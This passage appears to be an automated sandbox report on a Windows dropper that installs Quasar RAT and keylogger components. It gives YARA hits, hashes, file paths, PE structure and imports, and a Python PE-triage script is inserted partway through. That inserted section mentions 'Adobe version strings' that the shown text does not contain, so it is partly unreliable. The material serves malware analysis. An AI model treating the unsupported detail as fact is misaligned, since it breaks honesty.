• Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
• Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth
• Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Virustotal, Detection: 86%
• Antivirus: ReversingLabs, Detection: 93%
Reputation: unknown
C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Process: C:\Users\user\AppData\Local\Temp\windef.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 357376
Entropy (8bit): 6.424314821503838
Encrypted: false
SSDEEP: 6144:8K2J10qdSlEc39HGx5yVmnKKJfotFCuHi/b25s/Wz0J:8KF6y0KKlotF3iKO/Wz0J
MD5: B4A202E03D4135484D0E730173ABCC72
SHA1: 01B30014545EA526C15A60931D676F9392EA0C70
SHA-256: 7050608D53F80269DF951D00883ED79815C060CE7678A76B5C3F6A2A985BEEA9
SHA-512: 632A035A3B722EA29B02AAD1F0DA3DF5BDC38ABC7E6617223790955C6C0830F1070B528680416D5C63EA5E846074CDAD87F06C21C35A77B1CCC4EDC089D8B1FB
Malicious: true
Yara Hits:
• Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth
• Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth
• Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth
• Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth
• Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth
• Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth
• Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 93%
Reputation: unknown
                                        C:\Users\user\btpanui\SystemPropertiesPerformance.exe
                                        Process:C:\Users\user\Desktop\CVbJSUXraQ.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):2111272
                                        Entropy (8bit):6.7152149759316115
                                        Encrypted:false
                                        SSDEEP:24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYc:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9YC
                                        MD5:9423821A023FB02427783F6385871B3B
                                        SHA1:1F75D4DC2E3665B6025DCEF7E0D9A51D96C608A4
                                        SHA-256:CEFA469207046F1BA256D52D6685B40376A06159926AB3D20925FB413B487098
                                        SHA-512:52D3791DDA128D28B1CF803E2A4B8F355B223587550A02A178F5D7FB339B196CABE847AB49EBE2E70CDFDEA41FBF62752E71E1920182BBCA7C5BA5B9F3CFF2BB
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth
                                        • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth
                                        • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Avira, Detection: 100%
                                        Reputation:unknown
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...d..\.........."..........N.......}............@........................... ...........@...@.......@.....................L...|....p...............0 ...... ..q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q... ..r..................@..B........................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.715211023726544
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.72%
                                        • Win32 Executable (generic) a (10002005/4) 49.68%
                                        • Windows ActiveX control (116523/4) 0.58%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:CVbJSUXraQ.exe
                                        File size:2111264
                                        MD5:b0b78da613422be0de8de2e2a2d0ce68
                                        SHA1:a1aea30e16b3bbf15baf1fbb78499adcc5e11d97
                                        SHA256:efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0
                                        SHA512:6448d7a633aceae8c20fd077e5d4a83f5a542f4b229f0299440bd1b9d90772c83e5a9ca831fed1cf34e75fe08ade8cd386d651d50d1dfee1e102df496252ea57
                                        SSDEEP:24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYQ:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Yu
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                        File Icon

                                        Icon Hash:c4c4c4c8ccd4d0c4

                                        Static PE Info

                                        General

                                        Entrypoint:0x427dcd
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                        Time Stamp:0x5C87B664 [Tue Mar 12 13:38:44 2019 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:afcdf79be1557326c854b6e20cb900a7

                                        Entrypoint Preview

                                        Instruction
                                        call 00007F9848DC6C7Ah
                                        jmp 00007F9848DB9A44h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push edi
                                        push esi
                                        mov esi, dword ptr [esp+10h]
                                        mov ecx, dword ptr [esp+14h]
                                        mov edi, dword ptr [esp+0Ch]
                                        mov eax, ecx
                                        mov edx, ecx
                                        add eax, esi
                                        cmp edi, esi
                                        jbe 00007F9848DB9BCAh
                                        cmp edi, eax
                                        jc 00007F9848DB9F2Eh
                                        bt dword ptr [004C31FCh], 01h
                                        jnc 00007F9848DB9BC9h
                                        rep movsb
                                        jmp 00007F9848DB9EDCh
                                        cmp ecx, 00000080h
                                        jc 00007F9848DB9D94h
                                        mov eax, edi
                                        xor eax, esi
                                        test eax, 0000000Fh
                                        jne 00007F9848DB9BD0h
                                        bt dword ptr [004BE324h], 01h
                                        jc 00007F9848DBA0A0h
                                        bt dword ptr [004C31FCh], 00000000h
                                        jnc 00007F9848DB9D6Dh
                                        test edi, 00000003h
                                        jne 00007F9848DB9D7Eh
                                        test esi, 00000003h
                                        jne 00007F9848DB9D5Dh
                                        bt edi, 02h
                                        jnc 00007F9848DB9BCFh
                                        mov eax, dword ptr [esi]
                                        sub ecx, 04h
                                        lea esi, dword ptr [esi+04h]
                                        mov dword ptr [edi], eax
                                        lea edi, dword ptr [edi+04h]
                                        bt edi, 03h
                                        jnc 00007F9848DB9BD3h
                                        movq xmm1, qword ptr [esi]
                                        sub ecx, 08h
                                        lea esi, dword ptr [esi+08h]
                                        movq qword ptr [edi], xmm1
                                        lea edi, dword ptr [edi+08h]
                                        test esi, 00000007h
                                        je 00007F9848DB9C25h
                                        bt esi, 03h
                                        jnc 00007F9848DB9C78h

                                        Rich Headers

                                        Programming Language:
                                        • [ASM] VS2013 UPD4 build 31101
                                        • [ C ] VS2013 build 21005
                                        • [ C ] VS2008 SP1 build 30729
                                        • [LNK] VS2013 UPD4 build 31101
                                        • [C++] VS2013 build 21005
                                        • [ASM] VS2013 build 21005
                                        • [RES] VS2013 build 21005
                                        • [IMP] VS2008 SP1 build 30729

Data Directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xba44c         | 0x17c        | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xc7000         | 0x13a7f8     | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x203000        | 0x0          | .reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x202000        | 0x711c       | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x92bc0         | 0x1c         | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0xa4870         | 0x40         | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x8f000         | 0x884        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

Sections

Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy       | Characteristics
.text  | 0x1000          | 0x8dcc4      | 0x8de00  | False    | 0.572867910242  | data      | 6.67611805852 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000         | 0x2e10e      | 0x2e200  | False    | 0.335355267615  | data      | 5.76010872795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0xbe000         | 0x8f74       | 0x5200   | False    | 0.10175304878   | data      | 1.1987458977  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc  | 0xc7000         | 0x13a7f8     | 0x13a800 | False    | 0.481297042677  | data      | 6.62212260461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x202000        | 0x711c       | 0x7200   | False    | 0.765076754386  | data      | 6.77903165045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name          | RVA      | Size    | Type                                                                                                                                 | Language | Country
RT_ICON       | 0xc77b4  | 0x468   | GLS_BINARY_LSB_FIRST                                                                                                                 | English  | Great Britain
RT_ICON       | 0xc7c1c  | 0x128   | GLS_BINARY_LSB_FIRST                                                                                                                 | English  | Great Britain
RT_ICON       | 0xc7d44  | 0x668   | data                                                                                                                                 | English  | Great Britain
RT_ICON       | 0xc83ac  | 0x2e8   | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4294965391, next used block 7403512               | English  | Great Britain
RT_ICON       | 0xc8694  | 0x1e8   | data                                                                                                                                 | English  | Great Britain
RT_ICON       | 0xc887c  | 0x128   | GLS_BINARY_LSB_FIRST                                                                                                                 | English  | Great Britain
RT_ICON       | 0xc89a4  | 0x35e0  | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                                                          | English  | Great Britain
RT_ICON       | 0xcbf84  | 0xea8   | data                                                                                                                                 | English  | Great Britain
RT_ICON       | 0xcce2c  | 0x8a8   | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0                              | English  | Great Britain
RT_ICON       | 0xcd6d4  | 0x6c8   | data                                                                                                                                 | English  | Great Britain
RT_ICON       | 0xcdd9c  | 0x568   | GLS_BINARY_LSB_FIRST                                                                                                                 | English  | Great Britain
RT_ICON       | 0xce304  | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0                        | English  | Great Britain
RT_ICON       | 0xdeb2c  | 0x94a8  | data                                                                                                                                 | English  | Great Britain
RT_ICON       | 0xe7fd4  | 0x67e8  | data                                                                                                                                 | English  | Great Britain
RT_ICON       | 0xee7bc  | 0x5488  | data                                                                                                                                 | English  | Great Britain
RT_ICON       | 0xf3c44  | 0x4228  | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432 | English  | Great Britain
RT_ICON       | 0xf7e6c  | 0x25a8  | data                                                                                                                                 | English  | Great Britain
RT_ICON       | 0xfa414  | 0x10a8  | data                                                                                                                                 | English  | Great Britain
RT_STRING     | 0xfb4bc  | 0x594   | data                                                                                                                                 | English  | Great Britain
RT_STRING     | 0xfba50  | 0x68a   | data                                                                                                                                 | English  | Great Britain
RT_STRING     | 0xfc0dc  | 0x490   | data                                                                                                                                 | English  | Great Britain
RT_STRING     | 0xfc56c  | 0x5fc   | data                                                                                                                                 | English  | Great Britain
RT_STRING     | 0xfcb68  | 0x65c   | data                                                                                                                                 | English  | Great Britain
RT_STRING     | 0xfd1c4  | 0x466   | data                                                                                                                                 | English  | Great Britain
RT_STRING     | 0xfd62c  | 0x158   | data                                                                                                                                 | English  | Great Britain
RT_FONT       | 0xfd784  | 0x1c211 | ASCII text, with very long lines, with no line terminators                                                                           |          |
RT_FONT       | 0x119998 | 0x1c211 | ASCII text, with very long lines, with no line terminators                                                                           |          |
RT_RCDATA     | 0x135bac | 0x65600 | PE32 executable (GUI) Intel 80386, for MS Windows                                                                                    |          |
RT_RCDATA     | 0x19b1ac | 0x57400 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows                                                                 |          |
RT_RCDATA     | 0x1f25ac | 0xea26  | data                                                                                                                                 |          |
RT_GROUP_ICON | 0x200fd4 | 0x102   | data                                                                                                                                 | English  | Great Britain
RT_GROUP_ICON | 0x2010d8 | 0x14    | data                                                                                                                                 | English  | Great Britain
RT_VERSION    | 0x2010ec | 0x31c   | data                                                                                                                                 |          |
RT_MANIFEST   | 0x201408 | 0x3ef   | ASCII text, with CRLF line terminators                                                                                               | English  | Great Britain
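The Static PE Info, Data Directories, Sections and Resources tables above are exactly what a header-level parser yields, and the two RT_RCDATA entries typed as PE32 (one native, one Mono/.Net assembly) are the payloads a triage script should carve out of the resource section. The following Python is an added example written for this report, not Joe Sandbox code: it parses the DOS/NT headers, data directories and section table with the standard library only, computes per-section 8-bit entropy like the Sections table, derives `signed` from the SECURITY directory (size 0 here, consistent with "Digitally signed: false" despite the Adobe version strings) and `is_dotnet` from the COM descriptor directory, then scans the .rsrc byte range for embedded PE images. When run without an argument it uses a sample constructed by `build_pe()` / `demo_sample()` that mimics the layout (an outer PE32 carrying a native and a .NET PE in .rsrc); that sample, and the `build_pe` helper, are assumptions for illustration and are not the analysed binary.

```python
import math
import struct
import sys
from collections import Counter

def entropy(buf: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), the figure in the report's Entropy columns."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0

def parse_pe(data: bytes) -> dict:
    """Parse DOS/NT headers, data directories and section table of a PE32/PE32+ image.
    Raises ValueError or struct.error on anything that is not a well-formed PE."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsect, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                      # optional header follows the 20-byte file header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                       # PE32: 32-bit ImageBase at +28, directories at +96
        base, dirs_off = struct.unpack_from("<I", data, opt + 28)[0], opt + 96
    elif magic == 0x20B:                     # PE32+: 64-bit ImageBase at +24, directories at +112
        base, dirs_off = struct.unpack_from("<Q", data, opt + 24)[0], opt + 112
    else:
        raise ValueError("unknown optional-header magic 0x%x" % magic)
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    ndirs = struct.unpack_from("<I", data, dirs_off - 4)[0]
    dirs = [struct.unpack_from("<II", data, dirs_off + 8 * i) for i in range(min(ndirs, 16))]
    dirs += [(0, 0)] * (16 - len(dirs))      # (rva, size) per directory, padded to all 16 slots
    sections = []
    for i in range(nsect):
        name, vsize, va, rsize, rptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va,
                         "vsize": vsize, "raw_size": rsize, "raw_ptr": rptr, "flags": flags,
                         "entropy": entropy(data[rptr:rptr + rsize])})
    return {"machine": machine, "timestamp": stamp, "entry": entry, "imagebase": base,
            "dirs": dirs, "sections": sections,
            "signed": dirs[4][1] != 0,       # IMAGE_DIRECTORY_ENTRY_SECURITY holds the Authenticode blob
            "is_dotnet": dirs[14][1] != 0}   # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR is the CLR header

def rva_to_offset(info: dict, rva: int):
    """Map an RVA to a file offset via the section table (the report's 'Is in Section' logic)."""
    for s in info["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return rva - s["va"] + s["raw_ptr"]
    return None

def carve_embedded(data: bytes, start: int = 0, end: int = None) -> list:
    """Return (file_offset, headers) for every PE image found in data[start:end], e.g. the
    RT_RCDATA payloads inside .rsrc; 'MZ' hits that do not parse as a PE are skipped."""
    end = len(data) if end is None else end
    hits, pos = [], start
    while (pos := data.find(b"MZ", pos, end)) >= 0:
        try:
            hits.append((pos, parse_pe(data[pos:end])))
        except (ValueError, struct.error):
            pass
        pos += 2
    return hits

def build_pe(sections, dirs=None, machine=0x14C) -> bytes:
    """Assemble a minimal PE32 from (name, bytes) sections: constructed test input only, with no
    code or imports but every header field parse_pe() reads populated consistently."""
    FA, SA = 0x200, 0x1000                  # file and section alignment
    up = lambda n, a: (n + a - 1) // a * a
    hdr_size = up(0x40 + 24 + 0xE0 + 40 * len(sections), FA)
    shdrs, bodies, rptr, va = b"", b"", hdr_size, SA
    for name, body in sections:
        rsize = up(len(body), FA)
        shdrs += struct.pack("<8sIIIIIIHHI", name, len(body), va, rsize, rptr, 0, 0, 0, 0, 0x40000040)
        bodies += body.ljust(rsize, b"\0")
        rptr, va = rptr + rsize, va + up(len(body), SA)
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII", 0x10B, 14, 0, 0, 0, 0, SA, SA, 2 * SA,
                      0x400000, SA, FA, 5, 1, 0, 0, 5, 1, 0, va, hdr_size, 0, 2, 0x8140,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *(dirs or {}).get(i, (0, 0))) for i in range(16))
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)
    nt = b"PE\0\0" + struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0, 0xE0, 0x102)
    return (dos + nt + opt + shdrs).ljust(hdr_size, b"\0") + bodies

def demo_sample() -> bytes:
    """Constructed stand-in for the report's layout: an outer PE32 whose .rsrc carries one native
    and one .NET PE, like the two RT_RCDATA payloads above. Not the analysed binary."""
    native = build_pe([(b".text", b"\xC3" * 16)])
    dotnet = build_pe([(b".text", b"\x00" * 16)], dirs={14: (0x1000, 0x48)})   # CLR header present
    rsrc = b"\0" * 64 + native + b"\0" * 32 + dotnet
    return build_pe([(b".text", b"\xCC" * 32), (b".rsrc", rsrc)], dirs={2: (0x2000, len(rsrc))})

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else demo_sample()
    info = parse_pe(blob)
    print("machine=0x%x entry=0x%x signed=%s dotnet=%s" % (info["machine"], info["entry"], info["signed"], info["is_dotnet"]))
    for s in info["sections"]:
        print("  %-8s va=0x%06x raw=0x%06x@0x%06x entropy=%.2f" % (s["name"], s["va"], s["raw_size"], s["raw_ptr"], s["entropy"]))
    rsrc = next((s for s in info["sections"] if s["name"] == ".rsrc"), None)
    for off, inner in (carve_embedded(blob, rsrc["raw_ptr"], rsrc["raw_ptr"] + rsrc["raw_size"]) if rsrc else []):
        print("  embedded PE at 0x%x: machine=0x%x dotnet=%s" % (off, inner["machine"], inner["is_dotnet"]))
```

Run it as `python pe_triage.py CVbJSUXraQ.exe` to get the section table with entropies and, for this sample, the file offsets of the two PE images inside .rsrc; each carved image can then be hashed and compared against the dropped files listed earlier in the report. The carver deliberately tries every "MZ" rather than walking the resource directory, so it also finds payloads that are stored as raw bytes without an RT_RCDATA entry; the cost is a few false starts that the header validation rejects.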

Imports

WSOCK32.dll: WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll: GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll: ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll: WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll: InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL: GetProcessMemoryInfo
IPHLPAPI.DLL: IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll: DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll: IsThemeActive
KERNEL32.dll: DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll: AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
